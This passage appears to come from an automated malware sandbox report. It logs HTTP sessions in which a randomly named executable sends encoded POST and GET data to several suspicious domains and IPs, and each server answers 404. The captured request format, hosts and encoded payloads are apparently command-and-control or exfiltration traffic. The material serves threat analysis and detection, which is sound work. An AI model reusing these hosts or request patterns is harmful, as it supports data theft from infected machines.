                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 796
                                                                date: Sat, 11 Jan 2025 04:10:46 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.749983103.21.221.480360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:47.931823969 CET1768OUTPOST /4iun/ HTTP/1.1
                                                                Host: www.tempatmudisini06.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.tempatmudisini06.click
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.tempatmudisini06.click/4iun/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 62 54 67 4c 56 73 43 36 5a 34 79 59 51 65 42 6e 4d 45 64 4a 49 4a 33 78 58 68 68 42 69 32 37 77 6a 6b 48 47 57 59 43 34 79 4a 4c 49 46 6a 48 68 39 62 4e 49 6d 31 79 6a 2b 4f 6a 32 65 34 47 44 53 42 57 36 31 33 35 49 70 41 4c 77 36 48 77 43 36 43 55 59 35 64 61 4a 62 4d 4e 53 65 4a 71 34 6e 5a 71 62 74 39 79 7a 75 6b 76 54 54 4e 68 6c 79 6e 4e 6c 30 55 44 76 62 4d 7a 62 35 46 7a 2f 55 6e 57 6e 75 37 4e 49 36 38 49 54 30 32 53 65 32 33 41 34 31 4f 31 4c 6c 30 36 59 63 2f 31 49 71 6e 58 59 30 6d 39 42 4d 42 5a 73 32 6c 32 52 79 55 61 78 68 4b 72 49 77 71 78 5a 59 6e 53 50 71 48 36 46 75 48 4b 37 4a 35 73 46 4c 41 36 6d 73 2f 70 45 53 6e 35 72 31 74 72 42 7a 6e 4c 33 54 69 2f 6b 63 6e 54 71 38 31 4f 57 6b 46 4a 76 4f 4d 59 4b 4b 59 52 39 68 61 51 34 4b 71 6d 71 6b 6d 34 66 72 4c 38 41 5a 35 51 75 37 38 35 37 76 55 38 33 76 6a 45 6e 68 64 54 6f 62 52 7a 6c 56 2f 4a 30 77 2b 6f 44 52 31 2b 6b 64 58 43 78 4b 63 6a 34 53 41 35 42 76 58 38 33 79 33 33 4c 4c 4b 7a 5a 75 47 68 77 59 4e 4a [TRUNCATED]
                                                                Data Ascii: -Jkp4f=bTgLVsC6Z4yYQeBnMEdJIJ3xXhhBi27wjkHGWYC4yJLIFjHh9bNIm1yj+Oj2e4GDSBW6135IpALw6HwC6CUY5daJbMNSeJq4nZqbt9yzukvTTNhlynNl0UDvbMzb5Fz/UnWnu7NI68IT02Se23A41O1Ll06Yc/1IqnXY0m9BMBZs2l2RyUaxhKrIwqxZYnSPqH6FuHK7J5sFLA6ms/pESn5r1trBznL3Ti/kcnTq81OWkFJvOMYKKYR9haQ4Kqmqkm4frL8AZ5Qu7857vU83vjEnhdTobRzlV/J0w+oDR1+kdXCxKcj4SA5BvX83y33LLKzZuGhwYNJyhlWtTGWh1iuJOsqkL0FKt+Fhu+P0jH9O2wLS9ZyjecKDMcJSAUS3zDARgbvANShTUbK0kkQ/Ybc0lzX7L+7DiXZ/xNiUgDCCdjY2E6TPiQK9RAh9hbrliaVBIRAImpTbc8YxG90k9IE/YUFK6HHicvgzA+F6octI5mfHNGEEZePd7L/llkGJnSknqy9nlMBoPryEN9TiqAb1aI0JoYevdfRjgv/ANBDwk7iBBJGcu8pb5ghu6aHHJIodg+5QJ8dcWy8UFRGKjgZUQq6YrdUzlgKbRyed04u7R06Zgu3FfHwcTWaXPx7rxJxKrPuVG7Gt1cWcb4xTH1BaZrrdXKbDolvY+042R0o9TkFYpm1ahkrhD36nWD9DLZlDjFN5gUUezkDNWXIPfK9oh7HHNRbw2iHXF2gM1NaazptqxyOGB90hKv2jAGharLwPODTWwzGYainnFqFhnmzXFIi/cPExivbq50A6d3BwiTRLzV6u/R9ScvRc7eJBNP4nubqOl5pFreT+sNyyRwGJQjHsipEFJhtgenmb/h8A80cxqoEBNq7/yxybIRwWVU+9QnomtLKjqZrHuREX8e2waYVmdznS+AHJ/ZMOciHY7tjjlp7yK1R73ZJ14gjjOLJkgulnU+SvpN0DKxtPrw/Px3AbVWKa9haznyW7ctDFf [TRUNCATED]
                                                                Jan 11, 2025 05:10:48.816044092 CET1033INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 796
                                                                date: Sat, 11 Jan 2025 04:10:48 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.749984103.21.221.480360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:50.469890118 CET459OUTGET /4iun/?-Jkp4f=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywppdeeEuZCatrMvKH/wfqUumWqZ/cxrFwfzjD9bIbXwkyXSm2rk8ZQ8OQa&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.tempatmudisini06.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:51.383589983 CET1033INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 796
                                                                date: Sat, 11 Jan 2025 04:10:51 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.749985154.23.184.9580360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:56.560883999 CET696OUTPOST /lazq/ HTTP/1.1
                                                                Host: www.hm35s.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.hm35s.top
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.hm35s.top/lazq/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 62 76 38 76 56 2f 67 56 41 6c 7a 78 6d 70 4f 6e 33 43 42 70 6b 37 34 5a 46 6f 63 34 65 67 51 59 49 67 53 63 4b 68 47 4b 48 72 47 33 69 55 48 4b 62 39 36 57 68 6b 39 75 45 61 59 52 4c 68 78 2f 46 46 70 4c 37 38 66 66 64 41 43 77 72 2b 5a 78 79 62 38 62 62 6a 4c 4d 51 30 58 39 31 49 69 5a 49 6a 68 61 49 62 4d 69 4e 6d 55 43 2b 64 30 52 59 49 72 2f 4c 78 66 53 54 74 5a 37 79 70 72 54 6e 48 67 61 4e 50 6c 49 32 33 65 52 46 58 4f 46 71 4a 6c 58 61 43 70 41 79 4d 4c 73 64 44 71 42 48 52 61 51 41 75 6f 46 33 62 78 37 45 71 35 6b 31 37 2b 38 39 48 2b 4a 31 6b 47 32 6b 49 2f 31 33 55 37 47 67 52 6d 52 36 68 4e 49 46 41 47 62 57 77 3d 3d
                                                                Data Ascii: -Jkp4f=bv8vV/gVAlzxmpOn3CBpk74ZFoc4egQYIgScKhGKHrG3iUHKb96Whk9uEaYRLhx/FFpL78ffdACwr+Zxyb8bbjLMQ0X91IiZIjhaIbMiNmUC+d0RYIr/LxfSTtZ7yprTnHgaNPlI23eRFXOFqJlXaCpAyMLsdDqBHRaQAuoF3bx7Eq5k17+89H+J1kG2kI/13U7GgRmR6hNIFAGbWw==
                                                                Jan 11, 2025 05:10:57.435960054 CET312INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sat, 11 Jan 2025 04:10:57 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a5f968-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.749986154.23.184.9580360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:59.117089033 CET716OUTPOST /lazq/ HTTP/1.1
                                                                Host: www.hm35s.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.hm35s.top
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.hm35s.top/lazq/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 62 76 38 76 56 2f 67 56 41 6c 7a 78 6e 4a 65 6e 34 42 5a 70 7a 72 34 61 41 6f 63 34 48 51 52 52 49 67 65 63 4b 67 79 6b 48 5a 53 33 6a 31 33 4b 61 34 4f 57 67 6b 39 75 4c 4b 59 51 50 68 78 43 46 46 56 44 37 2b 4c 66 64 41 6d 77 72 2f 70 78 79 71 38 59 61 7a 4c 4f 62 55 58 37 34 6f 69 5a 49 6a 68 61 49 62 70 46 4e 6d 4d 43 2f 74 6b 52 4a 63 48 34 49 78 66 56 55 74 5a 37 32 70 72 70 6e 48 67 43 4e 4f 35 75 32 31 6d 52 46 53 71 46 71 59 6c 57 44 53 70 38 76 63 4b 73 64 7a 72 53 48 51 43 4a 46 66 73 6c 78 70 4a 45 46 63 34 47 76 5a 79 51 6a 57 47 79 78 6d 69 41 7a 75 69 41 31 56 2f 65 74 7a 53 77 6c 57 6f 69 49 53 6e 66 41 4e 6e 4b 72 69 51 50 54 33 4b 34 48 41 71 76 63 62 6c 33 69 54 51 3d
                                                                Data Ascii: -Jkp4f=bv8vV/gVAlzxnJen4BZpzr4aAoc4HQRRIgecKgykHZS3j13Ka4OWgk9uLKYQPhxCFFVD7+LfdAmwr/pxyq8YazLObUX74oiZIjhaIbpFNmMC/tkRJcH4IxfVUtZ72prpnHgCNO5u21mRFSqFqYlWDSp8vcKsdzrSHQCJFfslxpJEFc4GvZyQjWGyxmiAzuiA1V/etzSwlWoiISnfANnKriQPT3K4HAqvcbl3iTQ=
                                                                Jan 11, 2025 05:11:00.002583027 CET312INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sat, 11 Jan 2025 04:10:59 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a5f968-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.749987154.23.184.9580360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:01.661170006 CET1729OUTPOST /lazq/ HTTP/1.1
                                                                Host: www.hm35s.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.hm35s.top
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.hm35s.top/lazq/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 62 76 38 76 56 2f 67 56 41 6c 7a 78 6e 4a 65 6e 34 42 5a 70 7a 72 34 61 41 6f 63 34 48 51 52 52 49 67 65 63 4b 67 79 6b 48 59 71 33 6a 48 50 4b 56 2f 69 57 6e 6b 39 75 4e 36 59 56 50 68 78 54 46 46 39 48 37 2b 47 6b 64 43 75 77 72 5a 39 78 35 34 55 59 51 7a 4c 4f 55 30 58 2b 31 49 69 51 49 6a 51 54 49 62 35 46 4e 6d 4d 43 2f 72 41 52 5a 34 72 34 45 52 66 53 54 74 5a 33 79 70 71 47 6e 48 59 38 4e 50 4e 59 32 45 47 52 46 79 61 46 6f 71 39 57 4c 53 70 45 38 73 4b 43 64 7a 6d 4b 48 55 69 76 46 66 49 62 78 70 68 45 49 74 4a 66 71 59 4b 34 2f 6c 65 45 33 55 36 6c 79 50 4b 39 33 56 71 6d 79 6b 69 53 76 33 51 35 52 53 72 4b 45 59 71 4e 35 7a 38 66 4b 7a 43 4c 42 55 58 67 41 71 34 77 78 44 32 63 43 64 77 55 47 77 2b 4a 5a 75 4a 65 76 6f 35 51 78 7a 54 6a 62 41 79 48 4f 48 75 35 77 76 68 6e 37 53 70 77 45 73 34 42 50 2f 2b 74 71 58 2f 71 2b 42 55 58 6e 49 77 6f 75 4c 37 35 36 33 74 30 63 31 78 47 50 70 36 79 39 2b 4d 43 4b 6c 70 6f 64 36 77 48 53 66 6e 71 4a 61 70 72 67 51 6a 43 34 72 36 [TRUNCATED]
                                                                Data Ascii: -Jkp4f=bv8vV/gVAlzxnJen4BZpzr4aAoc4HQRRIgecKgykHYq3jHPKV/iWnk9uN6YVPhxTFF9H7+GkdCuwrZ9x54UYQzLOU0X+1IiQIjQTIb5FNmMC/rARZ4r4ERfSTtZ3ypqGnHY8NPNY2EGRFyaFoq9WLSpE8sKCdzmKHUivFfIbxphEItJfqYK4/leE3U6lyPK93VqmykiSv3Q5RSrKEYqN5z8fKzCLBUXgAq4wxD2cCdwUGw+JZuJevo5QxzTjbAyHOHu5wvhn7SpwEs4BP/+tqX/q+BUXnIwouL7563t0c1xGPp6y9+MCKlpod6wHSfnqJaprgQjC4r6RVgdZ4Zb01QzE2b4ZZrcYtHlKovYQdMYj/YtEMsmPqwRZpLB1sHPpYNUJ5OgUY9IbV0gpnIHWxudlO1ODfRqAh2D1CHgr6Rjm5tnz6Ad03qZsHVYQzy6xn+cWCR7nfH3vcUshmYG+9qRsXam0yv6qweoIMEPEvsmyg+oDirzAKsmGgbrDVHoygOadB4KV4orHD7gFMcNVwScIA6Y8Pjo424rWvfNe8/JvVgcc4HgT191AbSwewIfhRKQIUabIizE2VMfETkBXg4f/FndyMjX0SRRCOBeEu7pUpk8V9aXbPUCVBzEGmYBDvVPszcUOV2xpwqmyWm6q92rhlP3GaUKYmQl2mP9xKFAgJQxI2m/LyQTinTzvl/v1kwguGIMSo3ewieq9CR44uj+fz0DdIwt1yu6bFYTnQ+PgKaRNLhSZ7bEv0CAng8x8Qxytrn4HG6PQWde55KJ+oCFIOTCgRBImYrI6hADfQTWCojPtGn3xlHm6uJj2jhvKng9Bz9yXily027MMJrQ1b67wx9DdUu1pVGUs45WhdENjTxbM1CBwrI5EQZSQm+cS9X11vlBWUShH7JFcau1aHwji6pPkPOpXLia4Ak2/ITspkB0lm/4nMIzfvmQgpcjYHZM5la8rOVRcVHDzEh4ep4nnI23Gs2zeGWaDTNLb020H8 [TRUNCATED]
                                                                Jan 11, 2025 05:11:02.537204981 CET312INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sat, 11 Jan 2025 04:11:02 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a5f968-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.749988154.23.184.9580360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:04.203279972 CET446OUTGET /lazq/?-Jkp4f=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkSSnofUD+98uCWUF0f78bF04x35xFQJCgARn3b4pm0JSfuygzEuRCwX70&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.hm35s.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:05.088551998 CET312INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sat, 11 Jan 2025 04:11:04 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a5f968-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.74998988.198.8.15080360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:10.168541908 CET723OUTPOST /2lci/ HTTP/1.1
                                                                Host: www.snehasfashion.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.snehasfashion.shop
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.snehasfashion.shop/2lci/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
